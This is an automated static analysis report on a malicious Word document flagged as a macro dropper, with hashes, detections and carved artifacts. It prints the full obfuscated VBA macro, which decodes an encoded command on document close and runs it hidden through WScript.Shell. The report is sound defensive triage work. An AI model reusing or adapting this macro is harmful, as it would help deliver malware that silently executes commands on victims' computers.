Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ab0f7d145f178f26…

MALICIOUS

Office (OOXML)

37.0 KB Created: 2017-10-25 18:34:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-05-10
MD5: 9b6b92395d9cf055dab9b7e66f846ee5 SHA-1: 0bf1aff8aba805b348731ed52b047aa2e0982147 SHA-256: ab0f7d145f178f26444e9c5b1815911131a7f6ba4b41647280320a363e626b1a
184 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros. Heuristics indicate the use of Shell() and WScript.Shell, suggesting the execution of external commands or scripts. The VBA macro 'Document_Close' attempts to decode a long string and pass it to a function that uses WScript.Shell to run it, likely downloading and executing a second-stage payload.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6384333-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6384333-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      If Len(smarrito) < 4483 Then
        CreateObject("WScript.Shell").Run smarrito, vbHide * 4
      End If
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      If Len(smarrito) < 4483 Then
        CreateObject("WScript.Shell").Run smarrito, vbHide * 4
      End If
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2010/mainIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2523 bytes
SHA-256: 0d6bb12ffcb9577f479b426bb2005b602b3492438787493fcb16b7a3f0c60e0c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function velluto(oblio As Integer) As String
 avviso = Array("+", "N", "'", "T", "e", "y", "C", "i", "t", "o", "r", "c", "/", ".", "F", "O", "L", "x", "=", "-", "q", ")", ";", "m", "g", "w", "s", "p", "l", "n", " ", "a", "(", "d", "\", "S", "?", "D", ":", "h", "B", "j", "v", "$", "W", "A", ",", "X", "u", "E", "b", "P")
 Dim docente As Integer
 
 For docente = LBound(avviso) To UBound(avviso)
   If docente = oblio Then
    velluto = avviso(docente)
   End If
 Next
 
End Function


Public Function decreto(smarrito As String)
  If Len(smarrito) < 4483 Then
    CreateObject("WScript.Shell").Run smarrito, vbHide * 4
  End If
End Function

Sub Document_Close()
 feralo = ceramica("27092504102639042828301901094917070830194917041130400527312626301906092323312933303201042519155041041108303505260804231301040813440450062807042908211337092529280931331407280432023908082738121220272504094827282323094133310720131109231247161231113113270511024630430429423845515137450345300030023435072850291713041704022122303508311008195110091104262630430429423845515137450345023435072850291713041704022230320104251915504104110830350526080423130104081344045006280704290821133709252928093133350810072924320239080827381212202725040948272823230941333107201311092312261327392736073318311131022122")
 Application.Run "decreto", feralo
End Sub

Function asta(ByVal lacca As String, ByVal clinica As String)
 
pretesto = Array(lacca, clinica)
 zanna = ""
 
 
 For rivincita = 0 To UBound(pretesto)
   zanna = zanna & "" & pretesto(rivincita)
 Next
 
 asta = zanna
End Function

Function ceramica(Optional metallo As String, Optional metallo2)
  drago = spigoloso(Trim(metallo))
  intuito = ""

  For docente = 0 To Len(metallo)
    If (docente + 1) <= UBound(drago) Then
    dote = drago(docente + 1)
    vidimare = drago(docente)
    pedalare = velluto(Int(drago(docente) + dote))
    intuito = asta(intuito, pedalare)
    docente = docente + 1
    End If
  Next
  
  ceramica = intuito
End Function


Function spigoloso(nocivo As String, Optional mastino As Integer) As Variant
    spigoloso = Split(Left(StrConv(nocivo, vbUnicode), Len(StrConv(nocivo, vbUnicode)) - 1), vbNullChar)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 12800 bytes
SHA-256: 671761b9e9a97ba3687288fa9af12dbc50801f7c01e664429d247f5002fcd71f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).